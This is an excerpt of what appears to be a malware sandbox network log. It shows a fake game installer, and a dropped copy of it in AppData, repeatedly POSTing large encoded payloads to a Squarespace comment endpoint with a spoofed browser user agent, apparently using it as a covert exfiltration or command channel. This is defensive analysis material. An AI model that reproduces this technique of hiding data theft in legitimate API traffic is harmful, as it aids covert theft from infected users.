2024-09-01 20:04:34 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:04:35 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:34 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BXzF3zZbybX9Y2M4N2ZhNDBmYjU1OGQ5MTQ2Mzk1ZDE4ZDRlNzBi; Path=/; Secure Set-Cookie: crumb=BRuAF4sb0SuCNzA4NGE0OGZmNjU1M2Y4MDU0MzEyYWQ4ZjUzYmRj; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: 2yDPVfT2/kKNdTTnC Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BRuAF4sb0SuCNzA4NGE0OGZmNjU1M2Y4MDU0MzEyYWQ4ZjUzYmRj"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.5	49767	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:35 UTC	296	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 116722 Expect: 100-continue
2024-09-01 20:04:35 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:35 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:35 UTC	16306	OUT	Data Raw: 3d 74 51 73 50 33 36 39 66 25 32 42 69 79 58 52 5a 72 43 6b 38 55 6b 4b 76 6b 6c 2f 75 59 59 65 44 6f 4a 4c 73 65 7a 4d 53 2f 6d 6d 48 6a 55 42 71 7a 61 5a 58 52 6e 36 44 71 52 78 6d 7a 64 56 44 50 47 64 79 2f 70 37 79 71 69 6a 4a 30 4c 44 73 4d 5a 5a 52 53 34 6e 33 71 41 6b 6b 36 39 32 48 69 39 69 52 6d 63 75 33 66 75 4a 25 32 42 58 62 53 6a 37 62 35 52 77 48 64 41 67 56 79 73 79 67 43 2f 6a 6d 65 39 33 39 75 54 46 51 41 6d 6e 51 4d 72 6b 4c 70 74 31 57 4f 46 6a 76 67 38 73 52 45 52 78 35 42 42 35 66 56 75 41 49 56 64 61 65 4b 31 6b 75 64 6f 54 4a 54 65 49 6d 44 39 58 6e 50 6f 39 72 6e 6b 6d 44 48 56 4b 52 46 6d 25 32 42 4c 61 39 6a 78 34 4a 69 58 36 7a 57 77 38 50 32 37 48 48 34 47 41 6c 53 59 69 78 53 48 2f 7a 41 7a 53 78 32 5a 71 6e 50 6f 62 6d 37 4d Data Ascii: =tQsP369f%2BiyXRZrCk8UkKvkl/uYYeDoJLsezMS/mmHjUBqzaZXRn6DqRxmzdVDPGdy/p7yqijJ0LDsMZZRS4n3qAkk692Hi9iRmcu3fuJ%2BXbSj7b5RwHdAgVysygC/jme939uTFQAmnQMrkLpt1WOFjvg8sRERx5BB5fVuAIVdaeK1kudoTJTeImD9XnPo9rnkmDHVKRFm%2BLa9jx4JiX6zWw8P27HH4GAlSYixSH/zAzSx2ZqnPobm7M
2024-09-01 20:04:35 UTC	1	OUT	Data Raw: 71 Data Ascii: q
2024-09-01 20:04:35 UTC	16306	OUT	Data Raw: 38 79 76 2f 51 2f 50 48 38 43 65 75 76 69 59 43 53 68 43 39 32 63 54 49 4c 25 32 42 33 62 44 6a 35 79 6b 77 61 4d 4e 75 2f 41 47 44 65 61 59 46 59 70 64 73 58 53 33 55 32 51 30 63 61 56 4a 71 34 56 7a 70 72 64 39 32 78 61 65 62 25 32 42 41 68 64 56 73 58 6e 71 34 64 2f 44 36 34 25 32 42 7a 38 77 46 72 64 30 61 59 63 74 61 5a 51 52 38 30 43 47 54 34 55 35 6d 44 69 36 58 39 35 38 41 68 66 33 61 49 35 62 76 75 6f 6a 35 61 31 63 71 62 50 45 25 32 42 52 4f 54 34 64 64 6d 6e 6b 49 46 6e 55 36 78 6e 48 73 6b 4d 35 69 72 64 75 38 70 4f 69 49 41 6f 31 46 38 43 66 45 68 74 44 43 78 32 69 53 73 75 73 32 6c 49 43 34 61 7a 56 4b 4e 49 47 50 33 64 43 34 37 6d 6f 4a 36 68 61 72 71 36 41 33 73 6b 57 70 43 43 55 6e 4e 4c 47 46 35 61 42 31 7a 58 74 6c 48 70 48 55 74 69 34 Data Ascii: 8yv/Q/PH8CeuviYCShC92cTIL%2B3bDj5ykwaMNu/AGDeaYFYpdsXS3U2Q0caVJq4Vzprd92xaeb%2BAhdVsXnq4d/D64%2Bz8wFrd0aYctaZQR80CGT4U5mDi6X958Ahf3aI5bvuoj5a1cqbPE%2BROT4ddmnkIFnU6xnHskM5irdu8pOiIAo1F8CfEhtDCx2iSsus2lIC4azVKNIGP3dC47moJ6harq6A3skWpCCUnNLGF5aB1zXtlHpHUti4
2024-09-01 20:04:35 UTC	1	OUT	Data Raw: 46 Data Ascii: F
2024-09-01 20:04:35 UTC	16306	OUT	Data Raw: 42 43 66 61 4c 42 65 71 4d 33 43 67 34 34 56 6a 45 55 4a 4d 47 4d 43 33 45 36 74 46 31 30 75 69 43 34 4d 6f 35 74 78 4f 52 42 6d 32 78 74 49 70 35 4f 6c 66 4c 71 50 58 53 41 74 36 79 76 34 34 71 75 71 46 49 5a 59 68 46 6f 65 73 59 39 56 75 2f 4c 64 49 62 69 53 30 57 44 36 79 6d 33 42 59 74 49 57 2f 4d 47 38 4b 59 46 79 59 75 49 30 46 63 78 48 44 73 69 41 6b 73 66 42 4f 4b 48 77 72 45 25 32 42 71 6a 6c 47 45 79 42 4b 43 4a 52 74 50 74 61 43 36 56 59 64 35 36 61 70 45 61 4d 50 53 46 59 7a 67 67 4f 51 6a 77 68 42 70 36 77 55 30 44 33 4a 6f 46 2f 67 62 37 48 6d 2f 49 50 56 35 72 79 35 50 7a 4b 52 46 44 71 43 64 75 4d 38 78 52 54 48 39 79 6b 34 69 31 65 30 38 46 75 62 6a 71 6e 76 4e 53 58 6e 71 79 47 34 51 4c 69 47 70 33 6a 52 39 5a 6d 63 58 67 32 37 59 47 36 Data Ascii: BCfaLBeqM3Cg44VjEUJMGMC3E6tF10uiC4Mo5txORBm2xtIp5OlfLqPXSAt6yv44quqFIZYhFoesY9Vu/LdIbiS0WD6ym3BYtIW/MG8KYFyYuI0FcxHDsiAksfBOKHwrE%2BqjlGEyBKCJRtPtaC6VYd56apEaMPSFYzggOQjwhBp6wU0D3JoF/gb7Hm/IPV5ry5PzKRFDqCduM8xRTH9yk4i1e08FubjqnvNSXnqyG4QLiGp3jR9ZmcXg27YG6
2024-09-01 20:04:35 UTC	1	OUT	Data Raw: 6d Data Ascii: m
2024-09-01 20:04:35 UTC	16306	OUT	Data Raw: 6f 72 47 32 4f 6d 6f 5a 2f 43 67 30 37 61 56 39 43 48 31 44 77 77 41 56 47 41 50 6a 78 48 54 62 32 76 76 42 68 63 63 46 6d 6e 37 7a 4e 6e 43 78 38 6b 49 55 57 62 49 62 67 6a 7a 2f 64 78 67 6f 70 54 58 6c 7a 35 57 38 6f 75 4c 38 25 32 42 78 58 65 63 71 64 36 48 61 49 70 37 4b 75 61 7a 47 5a 57 47 71 6e 78 74 63 30 32 59 6d 6b 64 37 59 34 36 33 65 71 47 37 39 79 76 52 77 61 55 48 4f 63 45 6a 50 4b 44 54 65 2f 53 78 64 59 6c 51 32 38 73 56 57 46 41 59 55 72 5a 35 4a 53 4e 38 73 62 43 78 4c 31 62 66 51 54 51 6d 74 33 6c 4e 36 25 32 42 44 5a 41 71 78 67 39 2f 6a 6c 53 67 34 78 71 47 71 62 4b 42 33 69 74 59 6d 4d 74 42 71 47 64 66 64 78 72 63 59 53 72 47 61 50 67 6b 66 2f 49 79 7a 67 25 32 42 57 37 41 4b 73 52 42 4d 64 31 30 64 4a 55 77 33 4e 2f 32 6c 6b 57 66 Data Ascii: orG2OmoZ/Cg07aV9CH1DwwAVGAPjxHTb2vvBhccFmn7zNnCx8kIUWbIbgjz/dxgopTXlz5W8ouL8%2BxXecqd6HaIp7KuazGZWGqnxtc02Ymkd7Y463eqG79yvRwaUHOcEjPKDTe/SxdYlQ28sVWFAYUrZ5JSN8sbCxL1bfQTQmt3lN6%2BDZAqxg9/jlSg4xqGqbKB3itYmMtBqGdfdxrcYSrGaPgkf/Iyzg%2BW7AKsRBMd10dJUw3N/2lkWf
2024-09-01 20:04:35 UTC	1	OUT	Data Raw: 67 Data Ascii: g
2024-09-01 20:04:35 UTC	16306	OUT	Data Raw: 4f 69 56 77 59 4e 4b 6f 4b 4d 59 68 57 38 47 72 39 62 4c 44 45 77 64 7a 71 38 6b 62 64 63 4c 55 30 4d 6a 71 59 42 77 73 36 49 47 79 6d 6f 78 74 62 75 68 76 7a 65 4f 36 53 72 66 53 2f 79 53 77 25 32 42 4d 55 2f 59 39 31 46 46 31 66 50 70 46 67 76 68 37 37 6a 68 39 62 67 66 4c 43 45 31 43 30 41 4c 4d 64 61 4f 4d 33 41 63 39 4e 46 70 66 46 61 50 4f 4d 48 59 54 42 53 77 38 75 2f 72 74 31 48 32 6f 76 78 56 4d 4f 55 6c 69 2f 33 4b 72 4d 58 43 78 25 32 42 6d 33 39 6f 36 6c 78 51 68 4c 43 25 32 42 64 48 51 55 34 6b 32 41 44 62 4e 77 49 4a 54 58 57 48 42 72 52 37 75 7a 4c 78 4d 51 6e 78 6b 52 79 34 70 67 45 4b 39 63 48 58 58 33 4e 4a 31 6f 6b 41 46 31 35 39 45 43 61 38 63 5a 67 4b 38 4b 4d 74 4f 64 76 31 47 76 65 4f 7a 6d 31 6e 34 6c 4f 4f 68 25 32 42 6b 34 42 45 Data Ascii: OiVwYNKoKMYhW8Gr9bLDEwdzq8kbdcLU0MjqYBws6IGymoxtbuhvzeO6SrfS/ySw%2BMU/Y91FF1fPpFgvh77jh9bgfLCE1C0ALMdaOM3Ac9NFpfFaPOMHYTBSw8u/rt1H2ovxVMOUli/3KrMXCx%2Bm39o6lxQhLC%2BdHQU4k2ADbNwIJTXWHBrR7uzLxMQnxkRy4pgEK9cHXX3NJ1okAF159ECa8cZgK8KMtOdv1GveOzm1n4lOOh%2Bk4BE
2024-09-01 20:04:35 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:35 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BSGNczjSxJbqNzgwOGRkYmE3ZGY3YjVmMmZmZGQwZDJkNDk1MDEy; Path=/; Secure Set-Cookie: crumb=BYgX6B9rFBCbZTBhMjVkNzQyNzEwZjI0NzM0NjI4NGViOGVhODk4; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: TukOCds6/BxqZfnKp Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BYgX6B9rFBCbZTBhMjVkNzQyNzEwZjI0NzM0NjI4NGViOGVhODk4"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.5	49768	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:35 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:04:35 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:35 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:35 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:04:35 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:35 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BU0Sfp_2OWfJNmI5YTYzMDgyNWJlZDFlNGQ3MDYzYzM1MTUzNjVj; Path=/; Secure Set-Cookie: crumb=BaVmh3TcgVV6NTE0ZTQzNmJhYTBiMWUzNTM3OTIwODhhOGQ2NDNi; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: UctSFhfv/o5AZ2GJh Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BaVmh3TcgVV6NTE0ZTQzNmJhYTBiMWUzNTM3OTIwODhhOGQ2NDNi"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.5	49769	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:36 UTC	296	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 116722 Expect: 100-continue
2024-09-01 20:04:36 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:36 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:36 UTC	16306	OUT	Data Raw: 3d 74 51 73 50 33 36 39 66 25 32 42 69 79 58 52 5a 72 43 6b 38 55 6b 4b 76 6b 6c 2f 75 59 59 65 44 6f 4a 4c 73 65 7a 4d 53 2f 6d 6d 48 6a 55 42 71 7a 61 5a 58 52 6e 36 44 71 52 78 6d 7a 64 56 44 50 47 64 79 2f 70 37 79 71 69 6a 4a 30 4c 44 73 4d 5a 5a 52 53 34 6e 33 71 41 6b 6b 36 39 32 48 69 39 69 52 6d 63 75 33 66 75 4a 25 32 42 57 47 4c 78 69 69 70 6c 49 75 48 51 67 56 79 73 79 67 43 2f 6a 6d 65 39 33 39 75 54 46 51 41 6d 6e 51 4d 72 6b 4c 70 74 31 57 4f 46 6a 76 67 38 73 52 45 52 78 35 42 42 35 66 56 75 41 49 56 64 61 65 4b 31 6b 75 64 6f 54 4a 54 65 49 6d 44 39 58 6e 50 6f 39 72 6e 6b 6d 44 48 56 4b 52 46 6d 25 32 42 4c 61 39 6a 78 34 4a 69 58 36 7a 57 77 38 50 32 37 48 48 34 47 41 6c 53 59 69 78 53 48 2f 7a 41 7a 53 78 32 5a 71 6e 50 6f 62 6d 37 4d Data Ascii: =tQsP369f%2BiyXRZrCk8UkKvkl/uYYeDoJLsezMS/mmHjUBqzaZXRn6DqRxmzdVDPGdy/p7yqijJ0LDsMZZRS4n3qAkk692Hi9iRmcu3fuJ%2BWGLxiiplIuHQgVysygC/jme939uTFQAmnQMrkLpt1WOFjvg8sRERx5BB5fVuAIVdaeK1kudoTJTeImD9XnPo9rnkmDHVKRFm%2BLa9jx4JiX6zWw8P27HH4GAlSYixSH/zAzSx2ZqnPobm7M
2024-09-01 20:04:36 UTC	1	OUT	Data Raw: 71 Data Ascii: q
2024-09-01 20:04:36 UTC	16306	OUT	Data Raw: 38 79 76 2f 51 2f 50 48 38 43 65 75 76 69 59 43 53 68 43 39 32 63 54 49 4c 25 32 42 33 62 44 6a 35 79 6b 77 61 4d 4e 75 2f 41 47 44 65 61 59 46 59 70 64 73 58 53 33 55 32 51 30 63 61 56 4a 71 34 56 7a 70 72 64 39 32 78 61 65 62 25 32 42 41 68 64 56 73 58 6e 71 34 64 2f 44 36 34 25 32 42 7a 38 77 46 72 64 30 61 59 63 74 61 5a 51 52 38 30 43 47 54 34 55 35 6d 44 69 36 58 39 35 38 41 68 66 33 61 49 35 62 76 75 6f 6a 35 61 31 63 71 62 50 45 25 32 42 52 4f 54 34 64 64 6d 6e 6b 49 46 6e 55 36 78 6e 48 73 6b 4d 35 69 72 64 75 38 70 4f 69 49 41 6f 31 46 38 43 66 45 68 74 44 43 78 32 69 53 73 75 73 32 6c 49 43 34 61 7a 56 4b 4e 49 47 50 33 64 43 34 37 6d 6f 4a 36 68 61 72 71 36 41 33 73 6b 57 70 43 43 55 6e 4e 4c 47 46 35 61 42 31 7a 58 74 6c 48 70 48 55 74 69 34 Data Ascii: 8yv/Q/PH8CeuviYCShC92cTIL%2B3bDj5ykwaMNu/AGDeaYFYpdsXS3U2Q0caVJq4Vzprd92xaeb%2BAhdVsXnq4d/D64%2Bz8wFrd0aYctaZQR80CGT4U5mDi6X958Ahf3aI5bvuoj5a1cqbPE%2BROT4ddmnkIFnU6xnHskM5irdu8pOiIAo1F8CfEhtDCx2iSsus2lIC4azVKNIGP3dC47moJ6harq6A3skWpCCUnNLGF5aB1zXtlHpHUti4
2024-09-01 20:04:36 UTC	1	OUT	Data Raw: 46 Data Ascii: F
2024-09-01 20:04:36 UTC	16306	OUT	Data Raw: 42 43 66 61 4c 42 65 71 4d 33 43 67 34 34 56 6a 45 55 4a 4d 47 4d 43 33 45 36 74 46 31 30 75 69 43 34 4d 6f 35 74 78 4f 52 42 6d 32 78 74 49 70 35 4f 6c 66 4c 71 50 58 53 41 74 36 79 76 34 34 71 75 71 46 49 5a 59 68 46 6f 65 73 59 39 56 75 2f 4c 64 49 62 69 53 30 57 44 36 79 6d 33 42 59 74 49 57 2f 4d 47 38 4b 59 46 79 59 75 49 30 46 63 78 48 44 73 69 41 6b 73 66 42 4f 4b 48 77 72 45 25 32 42 71 6a 6c 47 45 79 42 4b 43 4a 52 74 50 74 61 43 36 56 59 64 35 36 61 70 45 61 4d 50 53 46 59 7a 67 67 4f 51 6a 77 68 42 70 36 77 55 30 44 33 4a 6f 46 2f 67 62 37 48 6d 2f 49 50 56 35 72 79 35 50 7a 4b 52 46 44 71 43 64 75 4d 38 78 52 54 48 39 79 6b 34 69 31 65 30 38 46 75 62 6a 71 6e 76 4e 53 58 6e 71 79 47 34 51 4c 69 47 70 33 6a 52 39 5a 6d 63 58 67 32 37 59 47 36 Data Ascii: BCfaLBeqM3Cg44VjEUJMGMC3E6tF10uiC4Mo5txORBm2xtIp5OlfLqPXSAt6yv44quqFIZYhFoesY9Vu/LdIbiS0WD6ym3BYtIW/MG8KYFyYuI0FcxHDsiAksfBOKHwrE%2BqjlGEyBKCJRtPtaC6VYd56apEaMPSFYzggOQjwhBp6wU0D3JoF/gb7Hm/IPV5ry5PzKRFDqCduM8xRTH9yk4i1e08FubjqnvNSXnqyG4QLiGp3jR9ZmcXg27YG6
2024-09-01 20:04:36 UTC	1	OUT	Data Raw: 6d Data Ascii: m
2024-09-01 20:04:36 UTC	16306	OUT	Data Raw: 6f 72 47 32 4f 6d 6f 5a 2f 43 67 30 37 61 56 39 43 48 31 44 77 77 41 56 47 41 50 6a 78 48 54 62 32 76 76 42 68 63 63 46 6d 6e 37 7a 4e 6e 43 78 38 6b 49 55 57 62 49 62 67 6a 7a 2f 64 78 67 6f 70 54 58 6c 7a 35 57 38 6f 75 4c 38 25 32 42 78 58 65 63 71 64 36 48 61 49 70 37 4b 75 61 7a 47 5a 57 47 71 6e 78 74 63 30 32 59 6d 6b 64 37 59 34 36 33 65 71 47 37 39 79 76 52 77 61 55 48 4f 63 45 6a 50 4b 44 54 65 2f 53 78 64 59 6c 51 32 38 73 56 57 46 41 59 55 72 5a 35 4a 53 4e 38 73 62 43 78 4c 31 62 66 51 54 51 6d 74 33 6c 4e 36 25 32 42 44 5a 41 71 78 67 39 2f 6a 6c 53 67 34 78 71 47 71 62 4b 42 33 69 74 59 6d 4d 74 42 71 47 64 66 64 78 72 63 59 53 72 47 61 50 67 6b 66 2f 49 79 7a 67 25 32 42 57 37 41 4b 73 52 42 4d 64 31 30 64 4a 55 77 33 4e 2f 32 6c 6b 57 66 Data Ascii: orG2OmoZ/Cg07aV9CH1DwwAVGAPjxHTb2vvBhccFmn7zNnCx8kIUWbIbgjz/dxgopTXlz5W8ouL8%2BxXecqd6HaIp7KuazGZWGqnxtc02Ymkd7Y463eqG79yvRwaUHOcEjPKDTe/SxdYlQ28sVWFAYUrZ5JSN8sbCxL1bfQTQmt3lN6%2BDZAqxg9/jlSg4xqGqbKB3itYmMtBqGdfdxrcYSrGaPgkf/Iyzg%2BW7AKsRBMd10dJUw3N/2lkWf
2024-09-01 20:04:36 UTC	1	OUT	Data Raw: 67 Data Ascii: g
2024-09-01 20:04:36 UTC	16306	OUT	Data Raw: 4f 69 56 77 59 4e 4b 6f 4b 4d 59 68 57 38 47 72 39 62 4c 44 45 77 64 7a 71 38 6b 62 64 63 4c 55 30 4d 6a 71 59 42 77 73 36 49 47 79 6d 6f 78 74 62 75 68 76 7a 65 4f 36 53 72 66 53 2f 79 53 77 25 32 42 4d 55 2f 59 39 31 46 46 31 66 50 70 46 67 76 68 37 37 6a 68 39 62 67 66 4c 43 45 31 43 30 41 4c 4d 64 61 4f 4d 33 41 63 39 4e 46 70 66 46 61 50 4f 4d 48 59 54 42 53 77 38 75 2f 72 74 31 48 32 6f 76 78 56 4d 4f 55 6c 69 2f 33 4b 72 4d 58 43 78 25 32 42 6d 33 39 6f 36 6c 78 51 68 4c 43 25 32 42 64 48 51 55 34 6b 32 41 44 62 4e 77 49 4a 54 58 57 48 42 72 52 37 75 7a 4c 78 4d 51 6e 78 6b 52 79 34 70 67 45 4b 39 63 48 58 58 33 4e 4a 31 6f 6b 41 46 31 35 39 45 43 61 38 63 5a 67 4b 38 4b 4d 74 4f 64 76 31 47 76 65 4f 7a 6d 31 6e 34 6c 4f 4f 68 25 32 42 6b 34 42 45 Data Ascii: OiVwYNKoKMYhW8Gr9bLDEwdzq8kbdcLU0MjqYBws6IGymoxtbuhvzeO6SrfS/ySw%2BMU/Y91FF1fPpFgvh77jh9bgfLCE1C0ALMdaOM3Ac9NFpfFaPOMHYTBSw8u/rt1H2ovxVMOUli/3KrMXCx%2Bm39o6lxQhLC%2BdHQU4k2ADbNwIJTXWHBrR7uzLxMQnxkRy4pgEK9cHXX3NJ1okAF159ECa8cZgK8KMtOdv1GveOzm1n4lOOh%2Bk4BE
2024-09-01 20:04:36 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:36 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BbEJOdJD7TMVYjIyYzM0MjM1MjhmYTM0NjQ1ZjEzYmUyN2QzZmIx; Path=/; Secure Set-Cookie: crumb=BewDqMRqiBRFODkxMzk0ODQxZjUxYmFlNzlhYjI1NjkxNTAwMzM5; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: rP0YDSuA/oVQy6Q77 Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BewDqMRqiBRFODkxMzk0ODQxZjUxYmFlNzlhYjI1NjkxNTAwMzM5"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.5	49770	198.185.159.177	443	5952	C:\Users\user\AppData\Roaming\nefgd\nefgd.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:36 UTC	296	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 116720 Expect: 100-continue
2024-09-01 20:04:36 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:36 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:36 UTC	16306	OUT	Data Raw: 3d 74 51 73 50 33 36 39 66 25 32 42 69 79 58 52 5a 72 43 6b 38 55 6b 4b 76 6b 6c 2f 75 59 59 65 44 6f 4a 4c 73 65 7a 4d 53 2f 6d 6d 48 6a 55 42 71 7a 61 5a 58 52 6e 36 44 71 52 78 6d 7a 64 56 44 50 47 64 79 2f 70 37 79 71 69 6a 4a 30 4c 44 73 4d 5a 5a 52 53 34 6e 33 71 41 6b 6b 36 39 32 48 69 39 44 44 5a 57 36 65 74 44 43 6d 54 65 75 59 51 43 66 4b 48 52 75 51 67 56 79 73 79 67 43 2f 6a 6d 65 39 33 39 75 54 46 51 41 6d 6e 51 4d 72 6b 4c 70 74 31 57 4f 46 6a 76 67 38 73 52 45 52 78 35 42 42 35 66 56 75 41 49 56 64 61 65 4b 31 6b 75 64 6f 54 4a 54 65 49 6d 44 39 58 6e 50 6f 39 72 6e 6b 6d 44 48 56 4b 52 46 6d 25 32 42 4c 61 39 6a 78 34 4a 69 58 36 7a 57 77 38 50 32 37 48 48 34 47 41 6c 53 59 69 78 53 48 2f 7a 41 7a 53 78 32 5a 71 6e 50 6f 62 6d 37 4d 54 4c Data Ascii: =tQsP369f%2BiyXRZrCk8UkKvkl/uYYeDoJLsezMS/mmHjUBqzaZXRn6DqRxmzdVDPGdy/p7yqijJ0LDsMZZRS4n3qAkk692Hi9DDZW6etDCmTeuYQCfKHRuQgVysygC/jme939uTFQAmnQMrkLpt1WOFjvg8sRERx5BB5fVuAIVdaeK1kudoTJTeImD9XnPo9rnkmDHVKRFm%2BLa9jx4JiX6zWw8P27HH4GAlSYixSH/zAzSx2ZqnPobm7MTL
2024-09-01 20:04:36 UTC	1	OUT	Data Raw: 79 Data Ascii: y
